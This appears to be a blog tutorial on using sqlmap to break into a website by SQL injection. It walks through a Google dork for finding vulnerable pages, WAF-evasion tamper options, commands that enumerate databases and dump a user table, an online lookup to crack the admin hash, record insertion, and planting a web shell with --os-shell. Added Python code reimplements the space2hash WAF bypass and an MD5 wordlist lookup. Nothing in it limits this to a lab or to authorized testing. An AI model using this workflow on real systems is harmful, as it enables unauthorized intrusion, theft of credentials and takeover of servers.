Best SQLMAP Tutorial

I'm just going to write the commands and give the relevant explanations. Let's say the target website is test.com. Follow the steps below:

Step 1:

Write a Google dork to find injectable parameters on test.com:

inurl:index.php?id= site:www.test.com (This is what I use most of the time; you can write your own.)

Step 2:

Install sqlmap, or use Kali Linux, which comes with sqlmap pre-installed.

Let's find out whether the website is vulnerable to SQL injection:

sqlmap -u "https://www.test.com/index.php?id=10" --threads=10 --tamper=space2hash --random-agent --dbs

Explanation:

-u : the target URL

--threads=10 : run up to 10 concurrent requests to speed up the injection process (10 is the maximum sqlmap accepts; it is noisy, so lower it if the target is fragile or rate-limited)

--tamper=space2hash : rewrite the payload to help get past a WAF (Web Application Firewall, e.g. ModSecurity). space2hash replaces each space with a '#' comment, random text and a newline, which is MySQL comment syntax, so it only works against a MySQL backend. No tamper script bypasses every WAF; try a few and watch the responses.

--random-agent : send a random User-Agent header. The User-Agent identifies the browser, and some sites block sqlmap's default one outright.

--dbs : enumerate the databases on the DBMS. If you only want the one the application is currently using, use --current-db instead.
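To see what --tamper=space2hash actually puts on the wire, here is a standalone Python re-implementation of the transformation. This is an added example modelled on sqlmap's tamper/space2hash.py, not the sqlmap file itself; the random filler is injectable so the output can be checked, and the sample payload is constructed for the demo.

```python
import random
import string


def _random_str(length=10):
    """Random alphanumeric filler, standing in for sqlmap's randomStr() (constructed helper)."""
    return "".join(random.choice(string.ascii_letters + string.digits) for _ in range(length))


def space2hash(payload, rand=_random_str):
    """Rewrite a MySQL payload the way the space2hash tamper does.

    Every space that is not inside a single- or double-quoted string is
    replaced with %23<random>%0A: '#' starts a MySQL line comment, the random
    text is ignored, and the URL-encoded newline ends the comment, so MySQL
    parses the query as if the space were still there while a WAF rule that
    keys on "AND 1=1"-style tokens separated by spaces never matches.
    """
    out = []
    in_single = in_double = False
    for ch in payload:
        if ch == "'" and not in_double:
            in_single = not in_single
        elif ch == '"' and not in_single:
            in_double = not in_double
        elif ch == " " and not in_single and not in_double:
            out.append("%%23%s%%0A" % rand())
            continue
        out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample, similar to a boolean-based test payload sqlmap sends.
    print(space2hash("1 AND 9227=9227"))
    # e.g. 1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227 (random part varies)
```

Only the comment trick is MySQL-specific; the quote tracking is why a payload such as 'a b' keeps its inner space and still compares equal on the server.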

Step 3:

Let's say that after completing step 2 you get the database name "testdb". Now the game is on :) Use the command below to list the tables in that database:

sqlmap -u "https://www.test.com/index.php?id=10" --threads=10 --tamper=space2hash --random-agent -D testdb --tables

Step 4:

Let's say that after completing step 3 you find a table named "user". Now let's retrieve the columns of the table user:

sqlmap -u "https://www.test.com/index.php?id=10" --threads=10 --tamper=space2hash --random-agent -D testdb -T user --columns

Step 5:

So let's dump all the content of the table user:

sqlmap -u "https://www.test.com/index.php?id=10" --threads=10 --tamper=space2hash --random-agent -D testdb -T user --dump

The output might look like this:

+----+----------------------------------------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash                                               | name      | email     | password | permission | system_home | system_allow_only |
+----+----------------------------------------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | c7a85972e188c669f0d1e24528a772a35DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+----------------------------------------------------+-----------+-----------+----------+------------+-------------+-------------------+

Now, is this hash MD5? An MD5 digest in hex is exactly 32 characters from 0-9 and a-f. The value shown is 50 characters long and contains letters outside a-f, so it is not a bare MD5 digest; it may be a digest with a salt appended, or a different scheme altogether. Run it through a hash identifier (hashid, for example) before you spend time on it. If it is plain MD5, go to http://www.md5online.org/md5-decrypt.html, paste the hash in the box and click decrypt. Keep in mind that MD5 cannot actually be decrypted: the site looks the hash up in a precomputed table of common passwords, so it only succeeds when the password is already in that table. In this case the password comes back as welcome@123.
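As an added example (not from the original post), here is what that "MD5 decrypt" step really amounts to, together with the length check from the text, in Python. The wordlist is a constructed stand-in for the precomputed tables such sites keep; DUMPED_VALUE is the hash column from the table above, and the other digests are computed in the block.

```python
import hashlib
import re

# A raw MD5 digest rendered as hex is exactly 32 characters from 0-9a-f.
MD5_HEX = re.compile(r"^[0-9a-fA-F]{32}$")


def looks_like_md5(value):
    """True only for a bare 32-hex-char digest. Anything longer, or with
    characters outside 0-9a-f, is hash+salt, base64, or another algorithm
    and should go through a hash identifier instead."""
    return bool(MD5_HEX.match(value.strip()))


def lookup_md5(target_hex, wordlist):
    """What an online 'MD5 decrypt' site does: hash each candidate and
    compare. Returns the matching password or None. Nothing is reversed;
    a password that is not in the list is never found."""
    target = target_hex.strip().lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            return candidate
    return None


# Constructed wordlist standing in for a site's precomputed table.
WORDLIST = ["123456", "password", "admin", "welcome@123", "letmein"]

# The value from the dump above: 50 characters, several outside 0-9a-f.
DUMPED_VALUE = "c7a85972e188c669f0d1e24528a772a35DIpzzDHFOwnCvPonu"

if __name__ == "__main__":
    print(looks_like_md5(DUMPED_VALUE))                  # False: not a bare MD5 digest
    sample = hashlib.md5(b"welcome@123").hexdigest()     # constructed target digest
    print(looks_like_md5(sample))                        # True
    print(lookup_md5(sample, WORDLIST))                  # welcome@123
    print(lookup_md5("d41d8cd98f00b204e9800998ecf8427e", WORDLIST))  # None (MD5 of "")
```

For anything beyond a toy list, hand the digest to hashcat or John with a real wordlist; the logic is the same, only faster.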

See, life is not as bad as it looks.

When life gets tough... below I am giving some scenarios. Maybe I'm not right, but they have helped me sometimes.

Scenario 1:

Let's imagine you want to insert your own record into the table. Use the command below. Note that a statement other than SELECT passed to --sql-query is only executed if the injection point supports stacked queries (the DBMS and the application's database driver both have to allow several statements in one request); if it doesn't, sqlmap will tell you it cannot run it.

sqlmap -u "https://www.test.com/index.php?id=10" --threads=10 --tamper=space2hash --random-agent -D testdb -T user --sql-query="INSERT INTO table_name (field1, field2, ...fieldN) VALUES (value1, value2, ...valueN)"

Note: I'm not going to explain the above query. Visit https://www.tutorialspoint.com/mysql/mysql-insert-query.htm for more information on SQL queries.

Scenario 2:

You want to upload a web shell through the SQL injection. --os-shell makes sqlmap write a small file stager and a web shell into the web server's document root and then gives you a command prompt on the server. It only works when the DBMS user is allowed to write files (on MySQL, the FILE privilege) and sqlmap can find, or you can tell it, a writable web root; along the way it asks which web language the server runs and which directory to use. The -D and -T options are not needed for this.

sqlmap -u "https://www.test.com/index.php?id=10" --threads=10 --tamper=space2hash --random-agent --os-shell

Scenario 3:

If your machine has a system proxy configured (the http_proxy/https_proxy environment variables) and you want sqlmap to bypass it and connect directly, sqlmap has an option for that. Note that this is about your own outgoing connection, not about the database sitting behind a proxy. If you instead want to send the traffic through a proxy, for example Burp listening on 127.0.0.1:8080 so you can watch the requests, use --proxy=http://127.0.0.1:8080.

sqlmap -u "https://www.test.com/index.php?id=10" --threads=10 --tamper=space2hash --random-agent -D testdb -T user --ignore-proxy

That's it, guys. I can't write more; it's boring. But if you want to master this tool, check out the links below; it is intense. :)

References :

https://github.com/sqlmapproject/sqlmap

http://www.guru99.com/learn-sql-injection-with-practical-example.html
